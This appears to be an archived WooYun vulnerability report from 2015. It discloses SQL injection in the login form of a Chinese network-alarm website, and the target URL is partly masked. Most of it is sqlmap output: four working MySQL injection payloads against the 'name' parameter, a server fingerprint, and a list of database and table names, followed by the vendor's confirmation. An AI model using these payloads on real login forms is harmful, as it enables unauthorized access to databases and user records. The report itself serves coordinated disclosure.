乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-16: 细节已通知厂商并且等待厂商处理中 2015-03-17: 厂商已经确认,细节仅向厂商公开 2015-03-27: 细节向核心白帽子及相关领域专家公开 2015-04-06: 细节向普通白帽子公开 2015-04-16: 细节向实习白帽子公开 2015-05-01: 细节向公众公开
rt
*****^络安全监^*****1.http://**.**.**/_*****^^注^********************aspx?oper=lo**********.8.15**********ion: ke**********ength**********l Mac OS X; U; en) P**********//202.8**********h: XMLHt**********ersion:**********on/x-www-for**********t: **********/202.8.1**********: gzip, **********: zh-CN,********************015 16:19:08 GMT+0800 (??-??*****
sqlmap identified the following injection points with a total of 27006 HTTP(s) requests:---Parameter: name (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: name=-9817' OR 3628=3628#&pass=asd&state=1&time=Fri Mar 13 2015 16:19:08 GMT 0800 (??-????????????��?��)&_= Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: name=-2869' OR 1 GROUP BY CONCAT(0x71716b6a71,(SELECT (CASE WHEN (9179=9179) THEN 1 ELSE 0 END)),0x7162766b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#&pass=asd&state=1&time=Fri Mar 13 2015 16:19:08 GMT 0800 (??-????????????��?��)&_= Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: name=asd';(SELECT * FROM (SELECT(SLEEP(5)))aQYR)#&pass=asd&state=1&time=Fri Mar 13 2015 16:19:08 GMT 0800 (??-????????????��?��)&_= Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT - comment) Payload: name=asd' AND (SELECT * FROM (SELECT(SLEEP(5)))dyUO)#&pass=asd&state=1&time=Fri Mar 13 2015 16:19:08 GMT 0800 (??-????????????��?��)&_=---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: MySQL 5.0.11sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: name (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: name=-9817' OR 3628=3628#&pass=asd&state=1&time=Fri Mar 13 2015 16:19:08 GMT 0800 (??-????????????��?��)&_= Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: name=-2869' OR 1 GROUP BY CONCAT(0x71716b6a71,(SELECT (CASE WHEN (9179=9179) THEN 1 ELSE 0 END)),0x7162766b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#&pass=asd&state=1&time=Fri Mar 13 2015 16:19:08 GMT 0800 (??-????????????��?��)&_= Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: name=asd';(SELECT * FROM (SELECT(SLEEP(5)))aQYR)#&pass=asd&state=1&time=Fri Mar 13 2015 16:19:08 GMT 0800 (??-????????????��?��)&_= Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT - comment) Payload: name=asd' AND (SELECT * FROM (SELECT(SLEEP(5)))dyUO)#&pass=asd&state=1&time=Fri Mar 13 2015 16:19:08 GMT 0800 (??-????????????��?��)&_=---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: MySQL 5.0.11Database: netalarm[23 tables]+---------------------------------------+| sysuser || tbnetalarm || tbwsba || xk_article || xk_channel || xk_collection || xk_collitem || xk_column || xk_diss || xk_friendlink || xk_master || xk_photo || xk_placard || xk_review || xk_soft || xk_source || xk_system || xk_templabel || xk_template || xk_tempproject || xk_user || xk_usergroup || xk_vote |+---------------------------------------+Database: information_schema[16 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || KEY_COLUMN_USAGE || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || STATISTICS || TABLES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+---------------------------------------+Database: mysql[17 tables]+---------------------------------------+| user || columns_priv || db || func || help_category || help_keyword || help_relation || help_topic || host || proc || procs_priv || tables_priv || time_zone || time_zone_leap_second || time_zone_name || time_zone_transition || time_zone_transition_type |+---------------------------------------+
过滤
危害等级:高
漏洞Rank:11
确认时间:2015-03-17 14:27
验证确认所描述的问题,已通知其修复。
暂无